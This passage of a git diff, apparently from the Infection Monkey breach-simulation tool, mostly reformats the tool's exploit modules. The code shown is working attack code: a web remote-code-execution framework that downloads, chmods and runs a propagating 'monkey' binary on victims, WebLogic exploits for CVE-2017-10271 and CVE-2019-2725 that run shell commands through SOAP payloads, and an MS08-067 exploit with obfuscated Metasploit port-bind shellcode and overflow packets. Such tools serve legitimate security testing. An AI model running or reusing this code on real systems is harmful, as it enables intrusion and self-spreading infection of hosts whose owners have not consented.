MONKEY_ARG, POWERSHELL_HTTP_UPLOAD, - RUN_MONKEY, WGET_HTTP_UPLOAD) +from infection_monkey.model import ( + BITSADMIN_CMDLINE_HTTP, + CHECK_COMMAND, + CHMOD_MONKEY, + DOWNLOAD_TIMEOUT, + DROPPER_ARG, + GET_ARCH_LINUX, + GET_ARCH_WINDOWS, + ID_STRING, + MONKEY_ARG, + POWERSHELL_HTTP_UPLOAD, + RUN_MONKEY, + WGET_HTTP_UPLOAD, +) from infection_monkey.network.tools import check_tcp_port, tcp_port_to_service from infection_monkey.telemetry.attack.t1197_telem import T1197Telem from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) # Command used to check if monkeys already exists @@ -26,7 +41,6 @@ WIN_ARCH_64 = "64" class WebRCE(HostExploiter): - def __init__(self, host, monkey_target_paths=None): """ :param host: Host that we'll attack @@ -37,9 +51,11 @@ class WebRCE(HostExploiter): if monkey_target_paths: self.monkey_target_paths = monkey_target_paths else: - self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux, - 'win32': self._config.dropper_target_path_win_32, - 'win64': self._config.dropper_target_path_win_64} + self.monkey_target_paths = { + "linux": self._config.dropper_target_path_linux, + "win32": self._config.dropper_target_path_win_32, + "win64": self._config.dropper_target_path_win_64, + } self.HTTP = [str(port) for port in self._config.HTTP_PORTS] self.skip_exist = self._config.skip_exploit_if_file_exist self.vulnerable_urls = [] @@ -55,20 +71,20 @@ class WebRCE(HostExploiter): # dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy # it's file to the default destination path. - exploit_config['dropper'] = False + exploit_config["dropper"] = False # upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD} # Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used. - exploit_config['upload_commands'] = None + exploit_config["upload_commands"] = None # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"] - exploit_config['url_extensions'] = [] + exploit_config["url_extensions"] = [] # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. - exploit_config['stop_checking_urls'] = False + exploit_config["stop_checking_urls"] = False # blind_exploit: If true we won't check if file exist and won't try to get the architecture of target. 
- exploit_config['blind_exploit'] = False + exploit_config["blind_exploit"] = False return exploit_config @@ -84,8 +100,8 @@ class WebRCE(HostExploiter): if not ports: return False # Get urls to try to exploit - potential_urls = self.build_potential_urls(ports, exploit_config['url_extensions']) - self.add_vulnerable_urls(potential_urls, exploit_config['stop_checking_urls']) + potential_urls = self.build_potential_urls(ports, exploit_config["url_extensions"]) + self.add_vulnerable_urls(potential_urls, exploit_config["stop_checking_urls"]) if not self.are_vulnerable_urls_sufficient(): return False @@ -94,26 +110,37 @@ class WebRCE(HostExploiter): self.vulnerable_port = HTTPTools.get_port_from_url(self.target_url) # Skip if monkey already exists and this option is given - if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.target_url): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + if ( + not exploit_config["blind_exploit"] + and self.skip_exist + and self.check_remote_files(self.target_url) + ): + LOG.info( + "Host %s was already infected under the current configuration, done" % self.host + ) return True # Check for targets architecture (if it's 32 or 64 bit) - if not exploit_config['blind_exploit'] and not self.set_host_arch(self.get_target_url()): + if not exploit_config["blind_exploit"] and not self.set_host_arch(self.get_target_url()): return False # Upload the right monkey to target - data = self.upload_monkey(self.get_target_url(), exploit_config['upload_commands']) + data = self.upload_monkey(self.get_target_url(), exploit_config["upload_commands"]) if data is False: return False # Change permissions to transform monkey into executable file - if self.change_permissions(self.get_target_url(), data['path']) is False: + if self.change_permissions(self.get_target_url(), data["path"]) is False: return False # Execute remote monkey - if self.execute_remote_monkey(self.get_target_url(), data['path'], exploit_config['dropper']) is False: + if ( + self.execute_remote_monkey( + self.get_target_url(), data["path"], exploit_config["dropper"] + ) + is False + ): return False return True @@ -135,15 +162,23 @@ class WebRCE(HostExploiter): :return: Returns all open ports from port list that are of service names """ candidate_services = {} - candidate_services.update({ - service: self.host.services[service] for service in self.host.services if - (self.host.services[service] and - 'name' in self.host.services[service] and - self.host.services[service]['name'] in names) - }) + candidate_services.update( + { + service: self.host.services[service] + for service in self.host.services + if ( + self.host.services[service] + and "name" in self.host.services[service] + and self.host.services[service]["name"] in names + ) + } + ) - valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if - tcp_port_to_service(port) in candidate_services] + valid_ports = [ + (port, candidate_services["tcp-" + str(port)]["data"][1]) + for port in port_list + if tcp_port_to_service(port) in candidate_services + ] return valid_ports @@ -156,15 +191,17 @@ class WebRCE(HostExploiter): def get_command(self, path, http_path, commands): try: - if 'linux' in self.host.os['type']: - command = commands['linux'] + if "linux" in self.host.os["type"]: + command = commands["linux"] else: - command = commands['windows'] + command = commands["windows"] # Format command - command = command % {'monkey_path': path, 
'http_path': http_path} + command = command % {"monkey_path": path, "http_path": http_path} except KeyError: - LOG.error("Provided command is missing/bad for this type of host! " - "Check upload_monkey function docs before using custom monkey's upload commands.") + LOG.error( + "Provided command is missing/bad for this type of host! " + "Check upload_monkey function docs before using custom monkey's upload commands." + ) return False return command @@ -196,7 +233,7 @@ class WebRCE(HostExploiter): """ url_list = [] if extensions: - extensions = [(e[1:] if '/' == e[0] else e) for e in extensions] + extensions = [(e[1:] if "/" == e[0] else e) for e in extensions] else: extensions = [""] for port in ports: @@ -205,7 +242,9 @@ class WebRCE(HostExploiter): protocol = "https" else: protocol = "http" - url_list.append(join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension)) + url_list.append( + join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension) + ) if not url_list: LOG.info("No attack url's were built") return url_list @@ -231,11 +270,11 @@ class WebRCE(HostExploiter): :param url: Url for exploiter to use :return: Machine architecture string or false. Eg. 'i686', '64', 'x86_64', ... """ - if 'linux' in self.host.os['type']: + if "linux" in self.host.os["type"]: resp = self.exploit(url, GET_ARCH_LINUX) if resp: # Pulls architecture string - arch = re.search(r'(?<=Architecture:)\s+(\w+)', resp) + arch = re.search(r"(?<=Architecture:)\s+(\w+)", resp) try: arch = arch.group(1) except AttributeError: @@ -261,10 +300,13 @@ class WebRCE(HostExploiter): def check_remote_monkey_file(self, url, path): command = LOOK_FOR_FILE % path resp = self.exploit(url, command) - if 'No such file' in resp: + if "No such file" in resp: return False else: - LOG.info("Host %s was already infected under the current configuration, done" % str(self.host)) + LOG.info( + "Host %s was already infected under the current configuration, done" + % str(self.host) + ) return True def check_remote_files(self, url): @@ -273,10 +315,10 @@ class WebRCE(HostExploiter): :return: True if at least one file is found, False otherwise """ paths = [] - if 'linux' in self.host.os['type']: - paths.append(self.monkey_target_paths['linux']) + if "linux" in self.host.os["type"]: + paths.append(self.monkey_target_paths["linux"]) else: - paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']]) + paths.extend([self.monkey_target_paths["win32"], self.monkey_target_paths["win64"]]) for path in paths: if self.check_remote_monkey_file(url, path): return True @@ -303,7 +345,7 @@ class WebRCE(HostExploiter): LOG.error("Couldn't get host machine's architecture") return False else: - self.host.os['machine'] = arch + self.host.os["machine"] = arch return True def run_backup_commands(self, resp, url, dest_path, http_path): @@ -317,7 +359,10 @@ class WebRCE(HostExploiter): """ if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp: LOG.info("Powershell not found in host. 
Using bitsadmin to download.") - backup_command = BITSADMIN_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path} + backup_command = BITSADMIN_CMDLINE_HTTP % { + "monkey_path": dest_path, + "http_path": http_path, + } T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() resp = self.exploit(url, backup_command) return resp @@ -330,25 +375,25 @@ class WebRCE(HostExploiter): :return: {'response': response/False, 'path': monkeys_path_in_host} """ LOG.info("Trying to upload monkey to the host.") - if not self.host.os['type']: + if not self.host.os["type"]: LOG.error("Unknown target's os type. Skipping.") return False paths = self.get_monkey_paths() if not paths: return False # Create server for http download and wait for it's startup. - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path']) + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) if not http_path: LOG.debug("Exploiter failed, http transfer creation failed.") return False LOG.info("Started http server on %s", http_path) # Choose command: if not commands: - commands = {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD} - command = self.get_command(paths['dest_path'], http_path, commands) + commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD} + command = self.get_command(paths["dest_path"], http_path, commands) resp = self.exploit(url, command) self.add_executed_cmd(command) - resp = self.run_backup_commands(resp, url, paths['dest_path'], http_path) + resp = self.run_backup_commands(resp, url, paths["dest_path"], http_path) http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() @@ -357,7 +402,7 @@ class WebRCE(HostExploiter): if resp is False: return resp else: - return {'response': resp, 'path': paths['dest_path']} + return {"response": resp, "path": paths["dest_path"]} def change_permissions(self, url, path, command=None): """ @@ -368,11 +413,11 @@ class WebRCE(HostExploiter): :return: response, False if failed and True if permission change is not needed """ LOG.info("Changing monkey's permissions") - if 'windows' in self.host.os['type']: + if "windows" in self.host.os["type"]: LOG.info("Permission change not required for windows") return True if not command: - command = CHMOD_MONKEY % {'monkey_path': path} + command = CHMOD_MONKEY % {"monkey_path": path} try: resp = self.exploit(url, command) T1222Telem(ScanStatus.USED, command, self.host).send() @@ -385,11 +430,13 @@ class WebRCE(HostExploiter): LOG.info("Permission change finished") return resp # If exploiter returns command output, we can check for execution errors - if 'Operation not permitted' in resp: + if "Operation not permitted" in resp: LOG.error("Missing permissions to make monkey executable") return False - elif 'No such file or directory' in resp: - LOG.error("Could not change permission because monkey was not found. Check path parameter.") + elif "No such file or directory" in resp: + LOG.error( + "Could not change permission because monkey was not found. Check path parameter." 
+ ) return False LOG.info("Permission change finished") return resp @@ -409,16 +456,23 @@ class WebRCE(HostExploiter): default_path = self.get_default_dropper_path() if default_path is False: return False - monkey_cmd = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - self.vulnerable_port, - default_path) - command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd} + monkey_cmd = build_monkey_commandline( + self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path + ) + command = RUN_MONKEY % { + "monkey_path": path, + "monkey_type": DROPPER_ARG, + "parameters": monkey_cmd, + } else: - monkey_cmd = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - self.vulnerable_port) - command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd} + monkey_cmd = build_monkey_commandline( + self.host, get_monkey_depth() - 1, self.vulnerable_port + ) + command = RUN_MONKEY % { + "monkey_path": path, + "monkey_type": MONKEY_ARG, + "parameters": monkey_cmd, + } try: LOG.info("Trying to execute monkey using command: {}".format(command)) resp = self.exploit(url, command) @@ -428,10 +482,10 @@ class WebRCE(HostExploiter): self.add_executed_cmd(command) return resp # If exploiter returns command output, we can check for execution errors - if 'is not recognized' in resp or 'command not found' in resp: + if "is not recognized" in resp or "command not found" in resp: LOG.error("Wrong path chosen or other process already deleted monkey") return False - elif 'The system cannot execute' in resp: + elif "The system cannot execute" in resp: LOG.error("System could not execute monkey") return False except Exception as e: @@ -448,23 +502,29 @@ class WebRCE(HostExploiter): :param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe :return: Corresponding monkey path from self.monkey_target_paths """ - if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey): - LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) + if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey): + LOG.error( + "Can't get destination path because source path %s is invalid.", url_to_monkey + ) return False try: - if 'linux' in url_to_monkey: - return self.monkey_target_paths['linux'] - elif 'windows-32' in url_to_monkey: - return self.monkey_target_paths['win32'] - elif 'windows-64' in url_to_monkey: - return self.monkey_target_paths['win64'] + if "linux" in url_to_monkey: + return self.monkey_target_paths["linux"] + elif "windows-32" in url_to_monkey: + return self.monkey_target_paths["win32"] + elif "windows-64" in url_to_monkey: + return self.monkey_target_paths["win64"] else: - LOG.error("Could not figure out what type of monkey server was trying to upload, " - "thus destination path can not be chosen.") + LOG.error( + "Could not figure out what type of monkey server was trying to upload, " + "thus destination path can not be chosen." + ) return False except KeyError: - LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize " - "custom dict of monkey's destination paths") + LOG.error( + 'Unknown key was found. 
Please use "linux", "win32" and "win64" keys to initialize ' + "custom dict of monkey's destination paths" + ) return False def get_monkey_paths(self): @@ -480,7 +540,7 @@ class WebRCE(HostExploiter): dest_path = self.get_monkey_upload_path(src_path) if not dest_path: return False - return {'src_path': src_path, 'dest_path': dest_path} + return {"src_path": src_path, "dest_path": dest_path} def get_default_dropper_path(self): """ @@ -488,14 +548,16 @@ class WebRCE(HostExploiter): :return: Default monkey's destination path for corresponding host or False if failed. E.g. config.dropper_target_path_linux(/tmp/monkey.sh) for linux host """ - if not self.host.os.get('type') or (self.host.os['type'] != 'linux' and self.host.os['type'] != 'windows'): + if not self.host.os.get("type") or ( + self.host.os["type"] != "linux" and self.host.os["type"] != "windows" + ): LOG.error("Target's OS was either unidentified or not supported. Aborting") return False - if self.host.os['type'] == 'linux': + if self.host.os["type"] == "linux": return self._config.dropper_target_path_linux - if self.host.os['type'] == 'windows': + if self.host.os["type"] == "windows": try: - if self.host.os['machine'] == WIN_ARCH_64: + if self.host.os["machine"] == WIN_ARCH_64: return self._config.dropper_target_path_win_64 except KeyError: LOG.debug("Target's machine type was not set. Using win-32 dropper path.") diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py index 00b62d3d6..2d1a40c0a 100644 --- a/monkey/infection_monkey/exploit/weblogic.py +++ b/monkey/infection_monkey/exploit/weblogic.py @@ -26,13 +26,13 @@ EXECUTION_TIMEOUT = 15 HEADERS = { "Content-Type": "text/xml;charset=UTF-8", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) " - "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" + "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36", } class WebLogicExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Weblogic' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Weblogic" def _exploit_host(self): exploiters = [WebLogic20192725, WebLogic201710271] @@ -49,37 +49,43 @@ class WebLogicExploiter(HostExploiter): # https://github.com/Luffin/CVE-2017-10271 # CVE: CVE-2017-10271 class WebLogic201710271(WebRCE): - URLS = ["/wls-wsat/CoordinatorPortType", - "/wls-wsat/CoordinatorPortType11", - "/wls-wsat/ParticipantPortType", - "/wls-wsat/ParticipantPortType11", - "/wls-wsat/RegistrationPortTypeRPC", - "/wls-wsat/RegistrationPortTypeRPC11", - "/wls-wsat/RegistrationRequesterPortType", - "/wls-wsat/RegistrationRequesterPortType11"] + URLS = [ + "/wls-wsat/CoordinatorPortType", + "/wls-wsat/CoordinatorPortType11", + "/wls-wsat/ParticipantPortType", + "/wls-wsat/ParticipantPortType11", + "/wls-wsat/RegistrationPortTypeRPC", + "/wls-wsat/RegistrationPortTypeRPC11", + "/wls-wsat/RegistrationRequesterPortType", + "/wls-wsat/RegistrationRequesterPortType11", + ] _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE def __init__(self, host): - super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh', - 'win32': 'monkey32.exe', - 'win64': 'monkey64.exe'}) + super(WebLogic201710271, self).__init__( + host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"} + ) def get_exploit_config(self): exploit_config = super(WebLogic201710271, self).get_exploit_config() - 
exploit_config['blind_exploit'] = True - exploit_config['stop_checking_urls'] = True - exploit_config['url_extensions'] = WebLogic201710271.URLS + exploit_config["blind_exploit"] = True + exploit_config["stop_checking_urls"] = True + exploit_config["url_extensions"] = WebLogic201710271.URLS return exploit_config def exploit(self, url, command): - if 'linux' in self.host.os['type']: - payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null') + if "linux" in self.host.os["type"]: + payload = self.get_exploit_payload( + "/bin/sh", "-c", command + " 1> /dev/null 2> /dev/null" + ) else: - payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL') + payload = self.get_exploit_payload("cmd", "/c", command + " 1> NUL 2> NUL") try: - post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) # noqa: DUO123 + post( + url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False + ) # noqa: DUO123 except Exception as e: LOG.error("Connection error: %s" % e) return False @@ -106,7 +112,7 @@ class WebLogic201710271(WebRCE): if httpd.get_requests > 0: # Add all urls because we don't know which one is vulnerable self.vulnerable_urls.extend(urls) - self.exploit_info['vulnerable_urls'] = self.vulnerable_urls + self.exploit_info["vulnerable_urls"] = self.vulnerable_urls else: LOG.info("No vulnerable urls found, skipping.") @@ -115,7 +121,9 @@ class WebLogic201710271(WebRCE): def check_if_exploitable_weblogic(self, url, httpd): payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port) try: - post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False) # noqa: DUO123 + post( + url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False + ) # noqa: DUO123 except exceptions.ReadTimeout: # Our request will not get response thus we get ReadTimeout error pass @@ -152,7 +160,7 @@ class WebLogic201710271(WebRCE): :param command: command itself :return: Formatted payload """ - empty_payload = ''' + empty_payload = """ @@ -175,7 +183,7 @@ class WebLogic201710271(WebRCE): - ''' + """ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) return payload @@ -187,7 +195,7 @@ class WebLogic201710271(WebRCE): :param port: Server's port :return: Formatted payload """ - generic_check_payload = ''' + generic_check_payload = """ @@ -202,7 +210,7 @@ class WebLogic201710271(WebRCE): - ''' + """ payload = generic_check_payload.format(host=ip, port=port) return payload @@ -226,10 +234,10 @@ class WebLogic201710271(WebRCE): class S(BaseHTTPRequestHandler): @staticmethod def do_GET(): - LOG.info('Server received a request from vulnerable machine') + LOG.info("Server received a request from vulnerable machine") self.get_requests += 1 - LOG.info('Server waiting for exploited machine request...') + LOG.info("Server waiting for exploited machine request...") httpd = HTTPServer((self.local_ip, self.local_port), S) httpd.daemon = True self.lock.release() @@ -258,9 +266,9 @@ class WebLogic20192725(WebRCE): def get_exploit_config(self): exploit_config = super(WebLogic20192725, self).get_exploit_config() - exploit_config['url_extensions'] = WebLogic20192725.URLS - exploit_config['blind_exploit'] = True - exploit_config['dropper'] = True + exploit_config["url_extensions"] = WebLogic20192725.URLS + exploit_config["blind_exploit"] = True + exploit_config["dropper"] = True return exploit_config def execute_remote_monkey(self, url, path, dropper=False): @@ -269,10 +277,10 @@ class 
WebLogic20192725(WebRCE): super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper) def exploit(self, url, command): - if 'linux' in self.host.os['type']: - payload = self.get_exploit_payload('/bin/sh', '-c', command) + if "linux" in self.host.os["type"]: + payload = self.get_exploit_payload("/bin/sh", "-c", command) else: - payload = self.get_exploit_payload('cmd', '/c', command) + payload = self.get_exploit_payload("cmd", "/c", command) try: resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT) return resp @@ -281,7 +289,7 @@ class WebLogic20192725(WebRCE): return False def check_if_exploitable(self, url): - headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''}) + headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""}) res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT) if res.status_code == 500 and "env:Client" in res.text: return True @@ -297,7 +305,7 @@ class WebLogic20192725(WebRCE): :param command: command itself :return: Formatted payload """ - empty_payload = ''' + empty_payload = """ @@ -323,6 +331,6 @@ class WebLogic20192725(WebRCE): - ''' + """ payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command) return payload diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py index 4a5e059b9..16b971cd8 100644 --- a/monkey/infection_monkey/exploit/win_ms08_067.py +++ b/monkey/infection_monkey/exploit/win_ms08_067.py @@ -16,7 +16,11 @@ from impacket.dcerpc.v5 import transport from common.utils.shellcode_obfuscator import clarify from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.smb_tools import SmbTools from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS from infection_monkey.network.smbfinger import SMBFinger @@ -25,81 +29,85 @@ from infection_monkey.network.tools import check_tcp_port LOG = getLogger(__name__) # Portbind shellcode from metasploit; Binds port to TCP port 4444 -OBFUSCATED_SHELLCODE = (b'4\xf6kPF\xc5\x9bI,\xab\x1d' - b'\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J' - b'\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01\'\xa8\x03\x90\x01\xec\x13' - b'\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq' - b'\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8' - b'\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J' - b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-') +OBFUSCATED_SHELLCODE = ( + b"4\xf6kPF\xc5\x9bI,\xab\x1d" + b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J" + b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13" + b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq" + b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8" + b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J" + b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-' +) SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode() -XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43" - "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01" - "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47" - 
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48" - "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49" - "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" - "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00" - "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02" - "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90" - "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00" - "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00") +XP_PACKET = ( + "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43" + "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01" + "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47" + "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48" + "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49" + "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a" + "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00" + "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02" + "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90" + "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00" + "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00" +) # Payload for Windows 2000 target -PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' -PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' -PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' -PAYLOAD_2000 += '\x41\x41' -PAYLOAD_2000 += '\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' -PAYLOAD_2000 += '\xeb\xcc' -PAYLOAD_2000 += '\x00\x00' +PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" +PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" +PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41" +PAYLOAD_2000 += "\x41\x41" +PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0" +PAYLOAD_2000 += 
